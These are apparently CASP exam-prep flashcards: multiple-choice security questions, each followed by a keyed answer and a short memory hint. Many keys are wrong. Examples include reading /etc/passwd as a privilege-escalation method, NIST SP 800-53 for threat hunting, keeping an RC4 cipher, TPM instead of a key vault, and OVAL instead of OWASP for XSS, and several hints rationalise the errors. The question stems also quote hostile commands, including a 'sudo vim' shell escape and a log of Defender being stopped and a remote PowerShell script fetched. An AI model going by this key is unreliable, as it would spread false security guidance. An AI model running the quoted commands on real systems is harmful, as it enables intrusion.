CASP Flashcards
A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief information Security Officer asks the security engineer to design connectivity to meet the following requirements:
- Only users with corporate-owned devices can directly access servers hosted by the cloud provider.
- The company can control what SaaS applications each individual user can access.
- User browser activity can be monitored.
Which of the following solutions would BEST meet these requirements?
A. IAM gateway, MDM, and reverse proxy
B. VPN, CASB, and secure web gateway
C. SSL tunnel, DLP, and host-based firewall.
D. API gateway, UEM, and forward proxy
B. VPN, CASB, and secure web gateway
VPN
During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels. Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?
A. Spawn a shell using sudo and an escape string such as sudo vim -c ‘!sh’.
B. Perform ASIC password cracking on the host
C. Read the /etc/passwd file to extract the usernames.
D. Initiate unquoted service path exploits.
E. Use the UNION operator to extract the database schema.
C. Read the /etc/passwd file to extract the usernames.
/etc/passwd
A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.
Which of the following would provide the BEST boot loader protection?
A. TPM
B. HSM
C. PKI
D. UEFI/BIOS
D. UEFI/BIOS
UEFI/BIOS
A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks. Which of the following would be the BEST solution against this type of attack?
A. Cookies
B. Wildcard certificates
C. HSTS
D. Certificate pinning
D. Certificate pinning
A threat hunting team receives a report about possible APT activity in the network. Which of the following threat management frameworks should the team implement?
A. NIST SP 800-53
B. MITRE ATT&CK
C. The Cyber Kill Chain
D. The Diamond Model of Intrusion Analysis
A. NIST SP 800-53
NIST
Device event logs sources from MDM software as follows:
Device - ANDROID_1022 Date/Time - 01JAN21 0255 Location - 39N, 77W Event - Push Description - Application 1220 Install Queued
Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?
A. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
B. Resource leak; recover the device for analysis and clean up the local storage.
C. Impossible travel; disable the device’s account and access while investigating.
D. Falsified status reporting; remotely wipe the device.
A. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
Install
An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.
Which of the following historian server locations will allow the business to get he required reports in an OT and IT environment?
A. In the OT environment, use a VPN from the IT environment into the OT environment.
B. In the OT environment, allow IT traffic into the OT environment.
C. In the IT environment, allow PLC’s to send data from the OT environment to the IT environment.
D. Use a screened subnet between the OT and IT environments.
A. In the OT environment, use a VPN from the IT environment into the OT environment.
VPN
Which of the following is a benefit of using steganalysis techniques in forensic response?
A. Breaking a symmetric cipher used in secure voice communications.
B. Determining the frequency of unique attacks against DRM-protected media.
C. Maintaining chain of custody for acquired evidence.
D. Identifying least significant bit encoding of data in a .wav file.
D. Identifying least significant bit encoding of data in a .wav file.
WAV file
A new web server must comply with new secure-by-design priciples and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:
TLS_AES_256_GCM_SHA384 TLS_CHACHA20_POLY1305_SHA256 TLS_AES_128_GCM_SHA256 TLS_AES_128_CCM_8_SHA256 TLS_RSA_WITH_AES_128_CBC_SHA256 TLS_DHE-DSS_WITH_RC4_128_SHA RSA_WITH_AES_128_CCM
Which of the following ciphers should the security analyst remove to support the business requirements?
A. TLS_AES_128_CCM_8_SHA256
B. TLS_DHE_DSS_WITH_RC4_128_SHA
C. TLS_CHACHA20_POLY1305_SHA256
D. TLS_AES_128_GCM_SHA256
C. TLS_CHACHA20_POLY1305_SHA256.
Poly
A security analyst notices a number of SIEM events that show the following activity:
10/30/2020
- 168.1.1 - sc stop WinDefend
- 168.1.2 - c:\program files\games\comptiacasp.exe
- 168.1.1 - c:\windows\system32\cmd.exe /c powershell https://content.comptia.com/content.exam.ps1
- 168.1.1 - powershell –> 40.90.23.154:443
Which of the following response actions should the analyst take FIRST?
A. Disable powershell.exe on all Microsoft Windows endpoints.
B. Restart Microsoft Windows Defender.
C. Configure the forward proxy to block 40.90.23.154.
D. Disable local administrator privileges on the endpoints.
A. Disable powershell.exe on all Microsoft Windows endpoints.
powershell
A company hired a third party to develop software as part of its strategy to be quicker to market. The company’s policy outlines the following requirements:
- The credentials used to publish production software to the container registry should be stored in a secure location.
- Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.
Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?
A. TPM
B. Local secure password file
C. MFA
D. Key vault
A. TPM
Storing shared credentials - TPM
A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location.
Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?
A. Execute never
B. No-execute
C. Total memory encryption
D. Virtual memory encryption
A. Execute never
ARM never
A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed. Which of the following will allow the inspection of the data without multiple certificate deployments?
A. Include all available cipher suites.
B. Create a wildcard certificate.
C. Use a third-party CA
D. Implement certificate pinning.
D. Implement certificate pinning.
pinning prevents multiple certificate deployments
A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells. Which of the following techniques will MOST likely meet the business’s needs?
A. Performing deep-packet inspection of all digital audio files.
B. Adding identifying filesystem metadata to the digital audio files.
C. Implementing steganography
D. Purchasing and installing DRM suite.
C. Implementing steganography
Steganography for all things audio. Cheaper than DRM.
Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.
Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?
A. Implement rate limiting on the API.
B. Implement geoblocking on the WAF.
C. Implement OAuth 2.0 on the API.
D. Implement input validation on the API.
C. Implement OAuth 2.0 on the API.
API’s do not require authorization - OAuth
An organization is considering a BYOD standard to support remote working. The first iteration of the solution will utilize only approved collaboration applications and the ability to move corporate data between those applications. The security team has concerns about the following:
- Unstructured data being exfiltrated after an employee leaves the organization.
- Data being exfiltrated as a result of compromised credentials.
- Sensitive information in emails being exfiltrated.
Which of the following solutions should the security team implement to mitigate the risk of data loss?
A. Mobile device management, remote wipe, and data loss detection.
B. Conditional access, DoH, and full disk encryption.
C. Mobile application management, MFA, and DRM
D. Certificates, DLP, geofencing
A. Mobile device management, remote wipe, and data loss detection.
BYOD - Mobile device management and remote wipe
A Chief Information Officer is considering migrating all company data to the cloud to save money on expensive SAN storage. Which of the following is a security concern that will MOST likely need to be addressed during migration?
A. Latency
B. Data exposure
C. Data loss
D. Data dispersion
A. Latency
On-prem SAN is quicker than off-prem cloud storage.
Due to locality and budget constraints, an organization’s satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and eternal resources while not sacrificing threat visibility. Which of the following would be the BEST option to implement?
A. Distributed connection allocation
B. Local caching
C. Content delivery network
D. SD-WAN vertical heterogeneity
C. Content delivery network
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O0 on the disk drive.
PID 83 - IO 304023 PID 65 - IO 300 PID 87 - IO 400020 PID 77 - IO 10 PID 85 - IO 0
A. 65
B. 77
C. 83
D. 87
D. 87
Pick the PID with the highest IO.
Which of the following are risks associated with vendor lock-in? (Choose two.)
A. The client can seamlessly move data.
B. The vendor can change product offerings.
C. The client receives a sufficient level of service.
D. The client experiences decreased quality of service.
E. The client can leverage a multicloud approach.
F. The client experiences increased interoperability.
B and D.
B - The vendor can change product offerings.
D - The client experiences decreased quality of service.
Think “what would Juniper do?”
An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented. Which of the following processes can be used to identify potential prevention recommendations?
A. Detection
B. Remediation
C. Preparation
D. Recovery
A. Detection
Detection the first step towards prevention.
A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern?
A. SDLC
B. OVAL
C. IEEE
D. OWASP
B. OVAL
Open Vulnerability and Assessment Language
A security engineer was auditing an organization’s current software development practice and discovered that multiple open-source libraries were integrated into the organization’s software.
The organization currently performs SAST and DAST on the software it develops.
Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries?
A. Perform additional SAST/DAST on the open-source libraries.
B. Implement the SDLC security guidelines.
C. Track the library versions and monitor the CVE website for related vulnerabilities.
D. Perform unit testing of the open-source libraries.
B. Implement the SDLC security guidelines.
SDLC to SDLC
A security analyst is investigating a possible buffer overflow attack. The following output was found on a user’s workstation:
graphic.linux_randomization.prg
Which of the following technologies would mitigate the manipulation of memory segments?
A. NX bit
B. ASLR
C. DEP
D. HSM
B. ASLR
Address Space Layout Randomization prevents buffer overflow